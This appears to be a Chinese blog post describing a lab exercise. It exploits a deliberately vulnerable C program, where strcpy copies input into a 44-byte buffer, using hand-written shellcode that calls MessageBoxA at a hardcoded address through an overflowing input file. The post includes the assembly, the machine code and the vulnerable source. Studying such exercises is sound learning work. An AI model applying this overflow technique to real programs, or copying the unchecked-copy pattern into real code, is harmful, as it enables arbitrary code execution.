人为漏洞的构造、文件的载入、弹出MessageBox

获得正确的结果已经不能满足我的欲望了，我希望能进一步的利用，从而弹出一个消息框，这将使用到MessageBox函数。

我们先计算MessageBoxA的地址

0x77D10000+0X000407EA=0x77D507EA

我们写入对应的汇编代码：

    __asm
    {
        xor ebx,ebx
        push ebx
        push 0x00003231
        push 0x30326b74
        mov eax,esp
        push ebx
        push eax
        push eax
        push ebx
        mov eax,0x77D507EA
        call eax
        add esp,0xc
    }

则，对应的机器码为：

 33DB       
  53           
 68 31320000  
  68 746B3230  
  8BC4        
  53           
  50          
  50           
  53           
 B8 EA07D577  
 FFD0        
 83C4 0C    

 将其写入到txt文件中，等待进行长度的匹配。

通过不断的调试，终于文件password.txt中的内容为

我们的源码中改变了一点

// stack_overflow.cpp : Defines the entry point for the console application.
 //
 
 #include "stdafx.h"
 #include <WINDOWS.H>
 #define  PASSWORD "1234567"
 
 int verify_password(char *password)
 {
     int authenticated;   
     char buffer[44];   
     authenticated = strcmp(password,PASSWORD);   
     strcpy(buffer,password);                     //溢出位置
     return authenticated;                        
 }
 
 void main()
 {
     LoadLibraryA("user32.dll");
 
     int valid_flag = 0;
     char password[1024];
     FILE* fp;
     if (!(fp = fopen("D:\\password.txt","rw+")))
     {
         exit(0);
     }
     fscanf(fp,"%s",password);
     valid_flag = verify_password(password);
     if (valid_flag)
     {
         printf("incorrect password!\n\n");
     } 
     else
     {
         printf("Congratulation!You have passed the verification!\n");
     }
     fclose(fp);
 }
 

添加了include <windows.h>和LoadLibrary（“user32.dll”）

为了添加messagebox方便。

因为strcpy会对00截断，所以我们构造的字符文件必须要满足一些条件，不断的调试。

成功后出现

可惜程序还是会出现崩溃，本来想实现堆栈平衡的，结果被strcpy截断了。

https://files.cnblogs.com/tk091/overflowExeAndTxt.rar

==================================

书读多了，就会有福至心灵的感觉。